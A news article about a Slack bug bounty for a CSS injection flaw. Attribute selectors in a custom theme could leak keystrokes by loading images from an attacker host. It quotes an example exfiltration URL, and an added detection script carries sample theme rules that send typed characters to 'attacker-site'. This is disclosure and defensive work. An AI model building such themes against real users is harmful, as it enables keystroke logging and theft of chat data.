$500 awarded for CSS injection vulnerability

Slack has awarded a bug bounty for a security issue that could have resulted in users’ chat data being exposed.

Security researcher Matt Langlois reported the CSS injection vulnerability to the instant messaging platform in August after learning that attribute selectors within the style sheet could be leveraged to log users’ keystrokes.

This means that a potential attacker could customize the CSS via the Slack website to request resources from an external server.

“More specifically that CSS allows you to determine the most recent value added to any type of input via the [value$="<value>"] [attribute] selector,” Langlois said in a blog post following the public disclosure of the bug in November.

Slack allows the loading of external images, meaning that an attacker could send data to their server.

Langlois was able to create a custom theme that, if applied by a user, could indeed successfully exfiltrate data.

There are limitations to this vulnerability, however – not least that the user would have to copy and paste the custom theme in order for the exploit to work, Langlois said.

“This theme is capable of determining when the user types the letter A into an <input type="text"> on Slack,” the researcher explained.

“When the user does this the CSS will load the background image https://attacker-site/A which can then be logged server side to indicate the user typed the letter A.”
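The pattern Langlois describes (a `[value$="…"]` attribute selector paired with a `background-image` that points at a remote host) is easy to spot mechanically before a pasted theme is applied. The following scanner is an added example, not Slack's code or the researcher's; it assumes a constructed theme string modelled on the article's description and an allow-list of hosts from which images may legitimately be loaded.

```python
import re
from urllib.parse import urlparse

# Constructed sample theme: two rules shaped like the keystroke-logging
# selector described in the article, plus two benign rules.
SAMPLE_THEME = """
.p-message_input { color: #fff; }
input[type="text"][value$="A"] { background-image: url("https://attacker-site/A"); }
input[type="text"][value$="B"] { background-image: url(https://attacker-site/B); }
.c-button { background-image: url("https://app.slack.com/img/button.png"); }
"""

# One CSS rule: everything before '{' is the selector, inside the braces is the body.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# Attribute selectors on `value` with =, ^=, $= or *= (e.g. [value$="A"]).
ATTR_SEL_RE = re.compile(r"\[\s*value\s*[\^\$\*]?=\s*['\"]?[^\]]*\]", re.I)
# url(...) references in a declaration block, quoted or unquoted.
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)


def find_value_exfil_rules(css, allowed_hosts):
    """Return (selector, url) pairs for rules that combine a `value` attribute
    selector with a url() whose host is not on the allow-list.

    A rule matching both conditions makes the browser fetch a remote resource
    conditioned on what the user has typed, which is the exfiltration channel
    the article describes. Hosts on `allowed_hosts` are treated as trusted."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for match in RULE_RE.finditer(css):
        selector, body = match.group(1).strip(), match.group(2)
        if not ATTR_SEL_RE.search(selector):
            continue
        for url in URL_RE.findall(body):
            host = urlparse(url.strip()).hostname
            if host and host.lower() not in allowed:
                findings.append((selector, url.strip()))
    return findings


if __name__ == "__main__":
    for selector, url in find_value_exfil_rules(SAMPLE_THEME, {"app.slack.com"}):
        print(f"suspicious rule: {selector} -> {url}")
```
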

Slack awarded $500 to Langlois via HackerOne for reporting the vulnerability. He’s putting the money toward his Movember fundraising campaign.
